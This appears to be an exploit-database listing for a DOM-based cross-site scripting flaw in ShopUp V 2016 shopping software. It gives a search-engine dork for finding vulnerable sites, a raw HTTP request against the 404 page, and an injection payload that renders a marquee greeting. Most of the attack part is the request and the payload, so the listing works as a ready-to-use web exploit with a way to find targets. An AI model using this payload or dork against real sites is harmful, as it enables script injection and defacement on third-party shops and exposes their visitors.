ShopUp V 2016 - DOM-based cross site scripting

2019.01.08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit title : Exploit author : Heisenberg software link : http://www.shopup.com version : * dork : intext:"Engine by Shopup.com" Tested on : Win7_64 GET /404.html[%Inject_Here%] HTTP/1.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* >Source : window.location >Location : http://target/404.html >Exploit : target/404.html[%Inject_Here%] >Use Payload/Injection : ?wvstest=javascript:domxssExecutionSink(1,"%27%5C"><xsstag><marquee><h>to my M7 and others F you are my stars it's great honor being with you wish you the best</h></marquee>)

References:

Salvatrucha


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top